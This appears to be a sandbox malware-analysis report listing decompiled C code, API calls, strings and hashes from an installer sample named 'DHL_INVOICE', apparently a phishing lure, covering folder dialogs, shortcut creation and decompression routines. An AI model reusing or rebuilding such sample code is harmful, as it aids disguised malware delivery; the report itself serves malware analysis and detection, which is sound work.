                                                                            							_t134 = 0x3e9;
                                                                            							__eflags = _t90 - 0x3e9;
                                                                            							if(_t90 != 0x3e9) {
                                                                            								goto L19;
                                                                            							}
                                                                            							_t123 = _a4;
                                                                            							_v28 = 0;
                                                                            							_v4 = 0;
                                                                            							_v32 = _t123;
                                                                            							_v24 = 0x42bd48;
                                                                            							_v12 = E00404F33;
                                                                            							_v8 = _t138;
                                                                            							_v28 = E00405EBA();
                                                                            							_t92 =  &_v40;
                                                                            							_v24 = 0x41;
                                                                            							__imp__SHBrowseForFolderW(_t92, 0x42dd68,  *((intOrPtr*)(_t125 + 0x38)));
                                                                            							__eflags = _t92;
                                                                            							if(__eflags == 0) {
                                                                            								L11:
                                                                            								_t135 = 0x40f;
                                                                            								goto L21;
                                                                            							}
                                                                            							__imp__CoTaskMemFree(_t92);
                                                                            							E00406556(_t138);
                                                                            							_t95 =  *( *0x435a10 + 0x11c);
                                                                            							__eflags = _t95;
                                                                            							if(_t95 != 0) {
                                                                            								__eflags = _t138 - L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
                                                                            								if(_t138 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring") {
                                                                            									_push(_t95);
                                                                            									_push(0);
                                                                            									E00405EBA();
                                                                            									_t98 = lstrcmpiW("Call", "Somatopleural Setup: Installing");
                                                                            									__eflags = _t98;
                                                                            									if(_t98 != 0) {
                                                                            										lstrcatW(_t138, "Call");
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							 *0x42dd60 =  *0x42dd60 + 1;
                                                                            							__eflags =  *0x42dd60;
                                                                            							SetDlgItemTextW(_t123, 0x3fb, _t138);
                                                                            							goto L19;
                                                                            						}
                                                                            						__eflags = _t134 >> 0x10 - 0x300;
                                                                            						if(__eflags != 0) {
                                                                            							goto L19;
                                                                            						}
                                                                            						goto L11;
                                                                            					} else {
                                                                            						_t124 = _a4;
                                                                            						_t149 = GetDlgItem(_t124, 0x3fb);
                                                                            						_t103 = E00406E03(_t138);
                                                                            						__eflags = _t103;
                                                                            						if(_t103 != 0) {
                                                                            							_t110 = E00406BC5(_t138);
                                                                            							__eflags = _t110;
                                                                            							if(_t110 == 0) {
                                                                            								E00406556(_t138);
                                                                            							}
                                                                            						}
                                                                            						 *0x4349dc = _t124;
                                                                            						SetWindowTextW(_t149, _t138);
                                                                            						_t143 = _a16;
                                                                            						_push( *((intOrPtr*)(_t143 + 0x34)));
                                                                            						_push(1);
                                                                            						E0040551A(_t124);
                                                                            						_push( *((intOrPtr*)(_t143 + 0x30)));
                                                                            						_push(0x14);
                                                                            						E0040551A(_t124);
                                                                            						E00405503(_t149);
                                                                            						_t108 = E004068E6(8);
                                                                            						__eflags = _t108;
                                                                            						if(_t108 != 0) {
                                                                            							 *_t108(_t149, 1);
                                                                            						}
                                                                            						L51:
                                                                            						goto L52;
                                                                            					}
                                                                            				} else {
                                                                            					E00406A3A(0x3fb, _t138);
                                                                            					E00406D3D(_t138);
                                                                            					L52:
                                                                            					return E0040575B(_t135, _a12, _a16);
                                                                            				}
                                                                            			}























































                                                                            0x00404085
                                                                            0x00404088
                                                                            0x00404090
                                                                            0x0040409a
                                                                            0x004040a0
                                                                            0x004040aa
                                                                            0x004040c4
                                                                            0x004040ca
                                                                            0x00404146
                                                                            0x0040414c
                                                                            0x00404231
                                                                            0x00404231
                                                                            0x00404233
                                                                            0x00404239
                                                                            0x00404246
                                                                            0x0040424c
                                                                            0x00404250
                                                                            0x00404256
                                                                            0x0040425d
                                                                            0x00404264
                                                                            0x00404265
                                                                            0x00404268
                                                                            0x0040426c
                                                                            0x00404270
                                                                            0x00404276
                                                                            0x0040427b
                                                                            0x0040427f
                                                                            0x00404281
                                                                            0x004042d5
                                                                            0x004042d7
                                                                            0x004042dd
                                                                            0x004042e2
                                                                            0x004042e4
                                                                            0x004042e6
                                                                            0x004042e8
                                                                            0x004042e8
                                                                            0x00404300
                                                                            0x00404306
                                                                            0x00404308
                                                                            0x00404343
                                                                            0x00404347
                                                                            0x0040434b
                                                                            0x00000000
                                                                            0x0040430a
                                                                            0x0040431d
                                                                            0x00404323
                                                                            0x00404324
                                                                            0x00404326
                                                                            0x00404339
                                                                            0x00404339
                                                                            0x0040433d
                                                                            0x0040434f
                                                                            0x00404356
                                                                            0x00404358
                                                                            0x0040435a
                                                                            0x0040436b
                                                                            0x0040436b
                                                                            0x0040436f
                                                                            0x0040436f
                                                                            0x00404374
                                                                            0x00404378
                                                                            0x0040437a
                                                                            0x00404384
                                                                            0x00404389
                                                                            0x0040438b
                                                                            0x004043b1
                                                                            0x0040438d
                                                                            0x0040438d
                                                                            0x0040439c
                                                                            0x0040439c
                                                                            0x0040438b
                                                                            0x004043b6
                                                                            0x004043bc
                                                                            0x004043be
                                                                            0x004043c7
                                                                            0x004043c7
                                                                            0x004043cf
                                                                            0x004043d0
                                                                            0x004043d7
                                                                            0x004043dc
                                                                            0x004043e8
                                                                            0x004043ee
                                                                            0x004043f0
                                                                            0x004043f2
                                                                            0x004043f8
                                                                            0x004043fa
                                                                            0x004043fa
                                                                            0x004043f8
                                                                            0x004043ff
                                                                            0x004043ff
                                                                            0x00000000
                                                                            0x004043ff
                                                                            0x0040435c
                                                                            0x0040435e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404360
                                                                            0x00404366
                                                                            0x00404368
                                                                            0x00000000
                                                                            0x00404368
                                                                            0x00404362
                                                                            0x00404364
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404364
                                                                            0x00404308
                                                                            0x00404283
                                                                            0x00404283
                                                                            0x00404285
                                                                            0x00404299
                                                                            0x0040429b
                                                                            0x0040429d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004042a3
                                                                            0x004042a5
                                                                            0x004042a7
                                                                            0x004042a7
                                                                            0x004042b4
                                                                            0x004042ba
                                                                            0x004042bd
                                                                            0x004042c0
                                                                            0x004042c1
                                                                            0x004042c4
                                                                            0x004042c8
                                                                            0x004042ce
                                                                            0x00000000
                                                                            0x004042d0
                                                                            0x004042d0
                                                                            0x00000000
                                                                            0x004042d0
                                                                            0x004042ce
                                                                            0x0040432e
                                                                            0x00404332
                                                                            0x00404336
                                                                            0x00404336
                                                                            0x00000000
                                                                            0x00404336
                                                                            0x0040423b
                                                                            0x00404240
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404240
                                                                            0x00404152
                                                                            0x00404156
                                                                            0x00404159
                                                                            0x0040415c
                                                                            0x0040417b
                                                                            0x00404180
                                                                            0x00404183
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040418c
                                                                            0x00404195
                                                                            0x00404199
                                                                            0x0040419d
                                                                            0x004041a1
                                                                            0x004041a9
                                                                            0x004041b1
                                                                            0x004041ba
                                                                            0x004041be
                                                                            0x004041c3
                                                                            0x004041cb
                                                                            0x004041d1
                                                                            0x004041d3
                                                                            0x00404171
                                                                            0x00404171
                                                                            0x00000000
                                                                            0x00404171
                                                                            0x004041d6
                                                                            0x004041dd
                                                                            0x004041e7
                                                                            0x004041ed
                                                                            0x004041ef
                                                                            0x004041f1
                                                                            0x004041f7
                                                                            0x004041f9
                                                                            0x004041fa
                                                                            0x004041fb
                                                                            0x0040420a
                                                                            0x00404210
                                                                            0x00404212
                                                                            0x0040421a
                                                                            0x0040421a
                                                                            0x00404212
                                                                            0x004041f7
                                                                            0x0040421f
                                                                            0x0040421f
                                                                            0x0040422c
                                                                            0x00000000
                                                                            0x0040422c
                                                                            0x00404168
                                                                            0x0040416b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040cc
                                                                            0x004040cc
                                                                            0x004040dd
                                                                            0x004040df
                                                                            0x004040e4
                                                                            0x004040e6
                                                                            0x004040e9
                                                                            0x004040ee
                                                                            0x004040f0
                                                                            0x004040f3
                                                                            0x004040f3
                                                                            0x004040f0
                                                                            0x004040fa
                                                                            0x00404100
                                                                            0x00404106
                                                                            0x0040410a
                                                                            0x0040410d
                                                                            0x00404110
                                                                            0x00404115
                                                                            0x00404118
                                                                            0x0040411b
                                                                            0x00404121
                                                                            0x00404128
                                                                            0x0040412d
                                                                            0x0040412f
                                                                            0x00404138
                                                                            0x00404138
                                                                            0x00404406
                                                                            0x00000000
                                                                            0x00404407
                                                                            0x004040ac
                                                                            0x004040b2
                                                                            0x004040b8
                                                                            0x00404408
                                                                            0x0040441b
                                                                            0x0040441b

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004040D6
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404100
                                                                              • Part of subcall function 00406A3A: GetDlgItemTextW.USER32(?,?,00000400,00404F4C), ref: 00406A4D
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DB2
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DC6
                                                                              • Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$ItemText$PrevWindow
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp\mnstring$Call$Somatopleural Setup: Installing$hB$hB$hB$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 4089110348-976841839
                                                                            • Opcode ID: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
                                                                            • Instruction ID: 78a62133d8830c36d5793369ed94498114b99b2b12e517e73a25645684f3fa2c
                                                                            • Opcode Fuzzy Hash: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
                                                                            • Instruction Fuzzy Hash: BD91BFB1704311ABD720AF658C81B6B76A8AF94744F41483EFB42B62D1D77CD9018BAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
                                                                            			E0040234F(void* _a4, signed int _a8, signed int _a12, char _a16, signed int _a36, signed int _a44, intOrPtr _a48, intOrPtr _a60, intOrPtr _a76) {
                                                                            				char _v0;
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr* _v24;
                                                                            				void* _v28;
                                                                            				intOrPtr* _v32;
                                                                            				void* _v36;
                                                                            				intOrPtr* _v40;
                                                                            				void* _v48;
                                                                            				void* _v56;
                                                                            				void* _v64;
                                                                            				void* _v68;
                                                                            				signed int _t46;
                                                                            				unsigned int _t49;
                                                                            				intOrPtr* _t56;
                                                                            				intOrPtr* _t58;
                                                                            				intOrPtr* _t60;
                                                                            				intOrPtr* _t62;
                                                                            				intOrPtr* _t64;
                                                                            				intOrPtr* _t66;
                                                                            				intOrPtr* _t68;
                                                                            				intOrPtr* _t70;
                                                                            				intOrPtr* _t72;
                                                                            				intOrPtr* _t74;
                                                                            				intOrPtr* _t76;
                                                                            				unsigned int _t80;
                                                                            				unsigned int _t81;
                                                                            				void* _t98;
                                                                            				intOrPtr* _t100;
                                                                            				signed int _t103;
                                                                            				void* _t108;
                                                                            				void* _t110;
                                                                            
                                                                            				_a76 = E0040303E(_t98, 0xfffffff0);
                                                                            				_a16 = E0040303E(_t98, 0xffffffdf);
                                                                            				_a60 = E0040303E(_t98, 2);
                                                                            				_a60 = E0040303E(_t98, 0xffffffcd);
                                                                            				_a48 = E0040303E(_t98, 0x45);
                                                                            				_t46 = _a36;
                                                                            				_a12 = _t46 & 0x00000fff;
                                                                            				_a8 = _t46 & 0x00008000;
                                                                            				_t103 = _t46 >> 0x0000000c & 0x00000007;
                                                                            				_a44 = _t46 >> 0x10;
                                                                            				if(E00406E03(_t42) == 0) {
                                                                            					E0040303E(_t98, 0x21);
                                                                            				}
                                                                            				_t49 =  &_a16;
                                                                            				__imp__CoCreateInstance(0x409adc, _t108, 1, 0x409abc, _t49);
                                                                            				_t80 = _t49;
                                                                            				if(_t80 >= 0) {
                                                                            					_t56 =  *((intOrPtr*)(_t110 + 0x10));
                                                                            					_t80 =  *((intOrPtr*)( *_t56))(_t56, 0x409acc,  &_v0);
                                                                            					if(_t80 >= 0) {
                                                                            						_t60 =  *((intOrPtr*)(_t110 + 0x10));
                                                                            						_t80 =  *((intOrPtr*)( *_t60 + 0x50))(_t60, _v8);
                                                                            						if(_v12 == _t108) {
                                                                            							_t76 = _v24;
                                                                            							 *((intOrPtr*)( *_t76 + 0x24))(_t76, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible");
                                                                            						}
                                                                            						if(_t103 != 0) {
                                                                            							_t74 = _v24;
                                                                            							 *((intOrPtr*)( *_t74 + 0x3c))(_t74, _t103);
                                                                            						}
                                                                            						_t62 = _v24;
                                                                            						 *((intOrPtr*)( *_t62 + 0x34))(_t62,  *((intOrPtr*)(_t110 + 0x40)));
                                                                            						_t100 =  *((intOrPtr*)(_t110 + 0x4c));
                                                                            						if( *_t100 != _t108) {
                                                                            							_t72 = _v32;
                                                                            							 *((intOrPtr*)( *_t72 + 0x44))(_t72, _t100,  *((intOrPtr*)(_t110 + 0x20)));
                                                                            						}
                                                                            						_t64 = _v32;
                                                                            						 *((intOrPtr*)( *_t64 + 0x2c))(_t64,  *((intOrPtr*)(_t110 + 0x48)));
                                                                            						_t66 = _v40;
                                                                            						 *((intOrPtr*)( *_t66 + 0x1c))(_t66, _a12);
                                                                            						if(_t80 >= 0) {
                                                                            							_t70 =  *((intOrPtr*)(_t110 + 0x14));
                                                                            							_t80 =  *((intOrPtr*)( *_t70 + 0x18))(_t70, _a16, 1);
                                                                            						}
                                                                            						_t68 =  *((intOrPtr*)(_t110 + 0x14));
                                                                            						 *((intOrPtr*)( *_t68 + 8))(_t68);
                                                                            					}
                                                                            					_t58 =  *((intOrPtr*)(_t110 + 0x10));
                                                                            					 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                            				}
                                                                            				E00405D3A((_t80 >> 0x0000001f & 0xfffffffc) - 0xc, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            				_t81 = _t80 >> 0x1f;
                                                                            				 *0x435ac8 =  *0x435ac8 + _t81;
                                                                            				return 0;
                                                                            			}



































                                                                            0x00402358
                                                                            0x00402365
                                                                            0x00402370
                                                                            0x0040237b
                                                                            0x00402384
                                                                            0x00402388
                                                                            0x00402396
                                                                            0x004023a9
                                                                            0x004023ad
                                                                            0x004023b0
                                                                            0x004023bb
                                                                            0x004023bf
                                                                            0x004023bf
                                                                            0x004023c4
                                                                            0x004023d8
                                                                            0x004023de
                                                                            0x004023e2
                                                                            0x004023e8
                                                                            0x004023fb
                                                                            0x004023ff
                                                                            0x00402405
                                                                            0x00402413
                                                                            0x00402419
                                                                            0x0040241b
                                                                            0x00402427
                                                                            0x00402427
                                                                            0x0040242c
                                                                            0x0040242e
                                                                            0x00402436
                                                                            0x00402436
                                                                            0x00402439
                                                                            0x00402444
                                                                            0x00402447
                                                                            0x0040244e
                                                                            0x00402450
                                                                            0x0040245c
                                                                            0x0040245c
                                                                            0x0040245f
                                                                            0x0040246a
                                                                            0x0040246d
                                                                            0x00402478
                                                                            0x0040247d
                                                                            0x0040247f
                                                                            0x0040248e
                                                                            0x0040248e
                                                                            0x00402490
                                                                            0x00402497
                                                                            0x00402497
                                                                            0x0040249a
                                                                            0x004024a1
                                                                            0x004024a1
                                                                            0x004024b5
                                                                            0x004024ba
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00409ADC,?,00000001,00409ABC,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\mnstring\Forcible, xrefs: 0040241F
                                                                            • C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll, xrefs: 004024AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\mnstring\Forcible$C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll
                                                                            • API String ID: 542301482-2157389783
                                                                            • Opcode ID: fa71e6c1b5bc3ea9f988551a356e3e4450701bd7444ffcb1ce1b00db588fc18d
                                                                            • Instruction ID: 400f91c807c924ebcba0c57f4558c7b9259f909ea30478445bd8bb36a2d5bedd
                                                                            • Opcode Fuzzy Hash: fa71e6c1b5bc3ea9f988551a356e3e4450701bd7444ffcb1ce1b00db588fc18d
                                                                            • Instruction Fuzzy Hash: 5E414C72604341AFC700DFA5C888A1BBBE9FF89315F14092EF655DB291DB79D805CB16
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
                                                                            			E00402B75(void* __edi, void* __esi, struct _WIN32_FIND_DATAW _a136, void* _a172) {
                                                                            				void* _v4;
                                                                            				intOrPtr _t10;
                                                                            				void* _t14;
                                                                            				void* _t20;
                                                                            
                                                                            				if(FindFirstFileW(E0040303E(_t14, 2),  &_a136) != 0xffffffff) {
                                                                            					E0040661F(__esi, _t5);
                                                                            					_push(_t20 + 0xb8);
                                                                            					_push(__edi);
                                                                            					E00406B1A();
                                                                            					_t10 =  *((intOrPtr*)(_t20 + 0x10));
                                                                            				} else {
                                                                            					 *__esi = __ax;
                                                                            					 *__edi = __ax;
                                                                            					_t10 = 1;
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + _t10;
                                                                            				return 0;
                                                                            			}







                                                                            0x00402b8e
                                                                            0x00402b9c
                                                                            0x00402b6e
                                                                            0x00402b6f
                                                                            0x00401d46
                                                                            0x00402ea1
                                                                            0x00402b90
                                                                            0x00402b92
                                                                            0x00402857
                                                                            0x0040170b
                                                                            0x0040170b
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
                                                                            • Instruction ID: 4ed41b4626080909459e48417ffb7120e43efe1e52fe46e4786edeb33a661726
                                                                            • Opcode Fuzzy Hash: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
                                                                            • Instruction Fuzzy Hash: ADD0EC61414150A9D2606F71894DABA73ADAF45314F204A3EF156E50D1EAB85501973B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E004075FE(signed int* __ebx, signed int __edi, signed int __esi) {
                                                                            				signed int _t447;
                                                                            				signed int _t450;
                                                                            				void* _t460;
                                                                            				signed int _t461;
                                                                            				signed int _t466;
                                                                            				signed int _t467;
                                                                            				void* _t469;
                                                                            				signed int _t470;
                                                                            				signed int _t475;
                                                                            				signed int _t476;
                                                                            				unsigned int _t505;
                                                                            				void* _t513;
                                                                            				signed int _t526;
                                                                            				signed int _t531;
                                                                            				signed int _t532;
                                                                            				signed int _t533;
                                                                            				signed int _t539;
                                                                            				signed int _t544;
                                                                            				signed int _t545;
                                                                            				void* _t546;
                                                                            				signed int _t547;
                                                                            				unsigned int _t555;
                                                                            				signed int _t559;
                                                                            				signed int* _t567;
                                                                            				signed int _t572;
                                                                            				signed int _t574;
                                                                            				signed int _t576;
                                                                            				signed int _t595;
                                                                            				void* _t602;
                                                                            				signed int _t604;
                                                                            				signed int _t607;
                                                                            				signed char _t608;
                                                                            				signed char* _t609;
                                                                            				signed int _t611;
                                                                            				signed int _t614;
                                                                            				signed int _t615;
                                                                            				void* _t616;
                                                                            				unsigned int _t619;
                                                                            				unsigned int _t625;
                                                                            				signed int* _t629;
                                                                            				signed char _t634;
                                                                            				signed char _t635;
                                                                            				signed char** _t637;
                                                                            				void* _t638;
                                                                            				signed int _t639;
                                                                            				unsigned int _t644;
                                                                            				signed int _t646;
                                                                            				signed int _t647;
                                                                            				unsigned int _t651;
                                                                            				signed int _t652;
                                                                            				void* _t657;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t652 = __esi;
                                                                            					_t647 = __edi;
                                                                            					_t567 = __ebx;
                                                                            					_t637 =  *(_t657 + 0x48);
                                                                            					L56:
                                                                            					while(_t652 < 0xe) {
                                                                            						if(_t447 == 0) {
                                                                            							L189:
                                                                            							 *(_t657 + 0x1c) =  *(_t657 + 0x1c) & 0x00000000;
                                                                            							_t567[0x147] = _t647;
                                                                            							_t567[0x146] = _t652;
                                                                            							_t637[1] = _t637[1] & 0x00000000;
                                                                            							L196:
                                                                            							 *_t637 =  *(_t657 + 0x14);
                                                                            							_t567[0x26ea] =  *(_t657 + 0x18);
                                                                            							L00407FBE(_t637);
                                                                            							_t450 =  *(_t657 + 0x1c);
                                                                            							L197:
                                                                            							return _t450;
                                                                            						}
                                                                            						L55:
                                                                            						 *(_t657 + 0x10) = _t447 - 1;
                                                                            						_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
                                                                            						 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
                                                                            						_t447 =  *(_t657 + 0x10);
                                                                            						_t652 = _t652 + 8;
                                                                            					}
                                                                            					_t572 = _t647 & 0x00003fff;
                                                                            					_t567[1] = _t572;
                                                                            					if((_t572 & 0x0000001f) > 0x1d || (_t572 & 0x000003e0) > 0x3a0) {
                                                                            						L186:
                                                                            						_t567[0x146] = _t652;
                                                                            						 *_t567 = 0x11;
                                                                            						_t567[0x147] = _t647;
                                                                            						_t637[1] =  *(_t657 + 0x10);
                                                                            						goto L196;
                                                                            					} else {
                                                                            						L59:
                                                                            						_t652 = _t652 - 0xe;
                                                                            						_t647 = _t647 >> 0xe;
                                                                            						_t567[2] = _t567[2] & 0x00000000;
                                                                            						 *(_t657 + 0x20) = _t652;
                                                                            						 *_t567 = 0xc;
                                                                            						while(1) {
                                                                            							L60:
                                                                            							_t574 = _t567[2];
                                                                            							_t637 =  *(_t657 + 0x48);
                                                                            							L65:
                                                                            							while(_t574 < (_t567[1] >> 0xa) + 4) {
                                                                            								while(1) {
                                                                            									L63:
                                                                            									_t460 = 3;
                                                                            									if(_t652 >= _t460) {
                                                                            										break;
                                                                            									}
                                                                            									L61:
                                                                            									_t461 =  *(_t657 + 0x10);
                                                                            									if(_t461 == 0) {
                                                                            										goto L189;
                                                                            									}
                                                                            									L62:
                                                                            									 *(_t657 + 0x10) = _t461 - 1;
                                                                            									_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
                                                                            									 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
                                                                            									_t652 = _t652 + 8;
                                                                            								}
                                                                            								L64:
                                                                            								_t466 = 7;
                                                                            								_t576 = _t647;
                                                                            								_t647 = _t647 >> 3;
                                                                            								_t467 = _t567[2];
                                                                            								_t96 = _t467 + 0x4099b0; // 0x121110
                                                                            								 *(_t567 + 0xc +  *_t96 * 4) = _t576 & _t466;
                                                                            								_t574 = _t567[2] + 1;
                                                                            								_t469 = 3;
                                                                            								_t652 = _t652 - _t469;
                                                                            								_t567[2] = _t574;
                                                                            								 *(_t657 + 0x20) = _t652;
                                                                            							}
                                                                            							_t638 = 0x13;
                                                                            							if(_t574 >= _t638) {
                                                                            								L68:
                                                                            								_t470 = 7;
                                                                            								 *(_t657 + 0x30) =  *(_t657 + 0x30) & 0x00000000;
                                                                            								_t567[0x143] = _t470;
                                                                            								_t475 = E00406EA8( &(_t567[3]), _t638, _t638, 0, 0,  &(_t567[0x144]),  &(_t567[0x143]),  &(_t567[0x148]), _t657 + 0x30);
                                                                            								if(_t475 != 0 || _t567[0x143] == _t475) {
                                                                            									L73:
                                                                            									 *_t567 = 0x11;
                                                                            									goto L22;
                                                                            								} else {
                                                                            									L70:
                                                                            									_t567[2] = _t567[2] & _t475;
                                                                            									 *_t567 = 0xd;
                                                                            									L71:
                                                                            									_t505 = _t567[1];
                                                                            									_t637 =  *(_t657 + 0x48);
                                                                            									 *(_t657 + 0x24) = _t505;
                                                                            									if(_t567[2] >= (_t505 & 0x0000001f) + 0x102 + (_t505 >> 0x00000005 & 0x0000001f)) {
                                                                            										L95:
                                                                            										_t595 =  *(_t657 + 0x24);
                                                                            										_t567[0x144] = _t567[0x144] & 0x00000000;
                                                                            										 *(_t657 + 0x2c) =  *(_t657 + 0x2c) & 0x00000000;
                                                                            										 *(_t657 + 0x30) = (_t595 & 0x0000001f) + 0x101;
